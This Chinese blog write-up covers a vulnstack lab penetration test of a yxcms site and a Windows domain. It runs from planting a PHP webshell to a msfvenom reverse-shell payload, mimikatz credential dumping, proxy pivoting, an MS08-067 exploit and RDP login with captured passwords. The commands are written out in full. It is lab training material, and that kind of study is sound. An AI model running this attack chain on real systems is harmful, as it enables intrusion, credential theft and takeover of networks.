IT数码 购物 网址 头条 软件 日历 阅读 图书馆
TxT小说阅读器
↓语音阅读,小说下载,古典文学↓
图片批量下载器
↓批量下载图片,美女图库↓
图片自动播放器
↓图片自动播放器↓
一键清除垃圾
↓轻轻一点,清除系统垃圾↓
开发: C++知识库 Java知识库 JavaScript Python PHP知识库 人工智能 区块链 大数据 移动开发 嵌入式 开发工具 数据结构与算法 开发测试 游戏开发 网络协议 系统运维
教程: HTML教程 CSS教程 JavaScript教程 Go语言教程 JQuery教程 VUE教程 VUE3教程 Bootstrap教程 SQL数据库教程 C语言教程 C++教程 Java教程 Python教程 Python3教程 C#教程
数码: 电脑 笔记本 显卡 显示器 固态硬盘 硬盘 耳机 手机 iphone vivo oppo 小米 华为 单反 装机 图拉丁
 
   -> PHP知识库 -> vulstrack——第二周 -> 正文阅读

[PHP知识库]vulstrack——第二周

首页
请添加图片描述
请添加图片描述

备份文件可以下载,是yxcms的源码
收集到的信息有:
1.通过升级日志可以看到相关的版本1.2.1
2.在protected/config.php文件中得到数据库连接账号、密码均为root
请添加图片描述

在phpMyAdmin
phpmyadmin存在弱口令,root、root就可以进行登录
找到yx_admin表,usename:admin,password:168a73655bfecefdb15b14984dd2ad60(不知道有用没有)

在yxcms的首页的公告信息当中发现后台登录地址及账号
进行登录
http://10.203.87.177/yxcms/index.php?r=admin/index/index
账号密码为admin、123456

在前台模板-》管理模板文件-》处发现可以对php文件进行编辑
向其中插入一句话木马

管理文件模块,可以在其中的php文件中插入一句话木马
拿到shell
这里我直接使用了备案信息里的一句话木马
通过蚁剑进行连接,拿到了shell
请添加图片描述
后来没了
自己在config.php新建了一句话木马
重新进行了连接

高权限
请添加图片描述

ipconfig,看到网卡的设置,可以看到ip:192.168.52.128
请添加图片描述

利用msfvenom生成一个后门程序
msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.203.87.233 LPORT=4444 -f exe > ports.exe请添加图片描述

通过蚁剑上传到了C:\Windows下
在msfconsole中进行设置

use exploit/multi/handler
show options
set payload windows/meterpreter/reverse_tcp
set LHOST 10.203.87.233
set LPORT 4444
exploit

在蚁剑中跳转到相应的目录
通过命令行运行exe文件 运行的命令是直接输入ports.exe
请添加图片描述
请添加图片描述
成功执行拿到权限
通过ipconfig看到他的其他ip网段
发现192.168.52.*的内网网段

查看用户信息
可以看到存在GOD的域
已经是比较高的administrator
进行提权至system
请添加图片描述

load mimikatz
kerberos
尝试获取明文密码,但是一直显示

mod_process::getVeryBasicModulesListForProcess : (0x0000012b) ō��
ReadProcessMemory WriteProcessMemory �B n.a. (wdigest KO)

当时没解决

去收集hash密码
但解密之后显示是空密码

难道是当时没提权?
提升至system
导出hash
run hashdump
还是一样的结果

然后就不弄了

去通过添加路由和设置代理来把流量转发出来

获取路由信息

run get_local_subnets

请添加图片描述

添加路由并设置socks5代理

meterpreter > run autoroute -s 192.168.52.0/24
meterpreter > run autoroute -p
meterpreter > background
msf5 exploit(multi/handler) > search socks5
msf5 exploit(multi/handler) > use 0
msf5 auxiliary(server/socks5) > options
msf5 auxiliary(server/socks5) > run

请添加图片描述
请添加图片描述
请添加图片描述

利用proxychain进行扫描
探测存活主机

proxychains nmap -sT -sV -Pn -n -p 80,445,443,22,35,3306 192.168.52.1-254

发现138、141的存活主机
请添加图片描述

138的主机135、80、445断口是开启的
发现141的139、21、135、1025、445端口是开启的
尝试进行利用入侵

重新进行内网的信息收集
进入shell
最先进行ipconfig /all
进行查看
存在乱码
请添加图片描述

首先输入chcp 65001
再输入ipconfig /all
查看ip信息
请添加图片描述

先看看内网dns的信息,一般内网的dns服务器都是域控机器
但是这个不是
通过net view查看域列表
请添加图片描述
分别对141和138进行扫描
可以区分域控和域内主机
请添加图片描述
请添加图片描述

域:god.org
三台服务器
域控:OWA:192.168.52.138
web服务:STU1:192.168.52.128
ROOT-TVI862UBEH:192.168.52.141

在这又重新收集
然后就得到了
为什么之前的不可以

有问题

通过load mimikatz
kerberos
获取到administrator的明文密码
H105yyds
请添加图片描述

利用ms08_067拿到141的权限

use exploit/windows/smb/ms08_067_netapi
set rhosts 192.168.52.141
set payload windows/meterpreter/bind_tcp
run

请添加图片描述
在141的主机上请添加图片描述

得到administrator的密码 toor

141扫描的时候发现没有打开3389的端口
在meterpreter下打开了端口
meterpreter > run post/windows/manage/enable_rdp

通过proxychain进行远程桌面登录
proxychains rdesktop 192.168.52.141
使用账号密码登录GOD
Administrator
H105yyds

请添加图片描述
登录192.168.52.141
账号密码是
Administrator
toor
请添加图片描述

  PHP知识库 最新文章
Laravel 下实现 Google 2fa 验证
UUCTF WP
DASCTF10月 web
XAMPP任意命令执行提升权限漏洞(CVE-2020-
[GYCTF2020]Easyphp
iwebsec靶场 代码执行关卡通关笔记
多个线程同步执行,多个线程依次执行,多个
php 没事记录下常用方法 (TP5.1)
php之jwt
2021-09-18
上一篇文章      下一篇文章      查看所有文章
加:2021-10-19 11:39:54  更:2021-10-19 11:41:07 
 
开发: C++知识库 Java知识库 JavaScript Python PHP知识库 人工智能 区块链 大数据 移动开发 嵌入式 开发工具 数据结构与算法 开发测试 游戏开发 网络协议 系统运维
教程: HTML教程 CSS教程 JavaScript教程 Go语言教程 JQuery教程 VUE教程 VUE3教程 Bootstrap教程 SQL数据库教程 C语言教程 C++教程 Java教程 Python教程 Python3教程 C#教程
数码: 电脑 笔记本 显卡 显示器 固态硬盘 硬盘 耳机 手机 iphone vivo oppo 小米 华为 单反 装机 图拉丁

360图书馆 购物 三丰科技 阅读网 日历 万年历 2024年12日历 -2024/12/28 13:38:17-

图片自动播放器
↓图片自动播放器↓
TxT小说阅读器
↓语音阅读,小说下载,古典文学↓
一键清除垃圾
↓轻轻一点,清除系统垃圾↓
图片批量下载器
↓批量下载图片,美女图库↓
  网站联系: qq:121756557 email:121756557@qq.com  IT数码
数据统计